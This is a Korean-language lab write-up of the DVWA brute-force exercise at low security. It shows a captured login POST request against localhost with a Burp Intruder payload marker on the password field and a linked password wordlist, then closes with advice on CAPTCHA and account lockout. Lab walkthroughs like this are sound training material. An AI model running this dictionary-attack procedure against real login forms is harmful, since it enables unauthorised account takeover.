DVWA Brute Force [ Security Low ]
[그림 1]
Summary
[그림1] 는 Brute Force 공격을 시도해 볼 수 있도록 개발된 로그인 폼을 제공하고 있습니다.
Description
[그림1] 에서는 로그인 실패 시
로그인 시도 제한
옵션으로 캡차
,계정잠금
등의 적절한 보안설정이 적용되어 있지 않아 다음과 같은 공격 시도가 가능합니다.1. 사전파일 대입
2. 무차별대입
Steps to reproduce
1. username=admin password=test를 입력 후 로그인하는 과정에서 Burp Suite 를 통해 패킷을 잡은 뒤 , Send to Intruder 를 클릭합니다.
이때 Attack type : Sniper 를 선택합니다 . (공격 대상은 password=§test§ 입니다)
POST /DVWA/vulnerabilities/brute/ HTTP/1.1
Host: localhost.
Content-Length: 83
Cache-Control: max-age=0
Origin: http://localhost.
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Referer: http://localhost./DVWA/vulnerabilities/brute/
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: security=impossible; security=impossible; PHPSESSID=bl4k880362sspjishnuv5nnp6v
Connection: close
username=admin&password=§test§&Login=Login&user_token=3eb9fc7ad1265a0bbcbcb333950cc8d637f
https://github.com/1N3/IntruderPayloads/blob/master/FuzzLists/passwords_quick.txt
3. Payload 설정이 완료되면 Start Attack 을 통해 사전파일 대입 공격을 진행합니다.
Impact
공격자는 무차별 대입 / 사전 파일 대입 공격을 통해 관리자의 비밀번호를 알아낼수있습니다. 따라서 로그인 실패 시 로그인 시도 제한옵션으로 캡차,계정잠금등의 적절한 보안설정을 통해 이를 방어해야합니다.
댓글
댓글 쓰기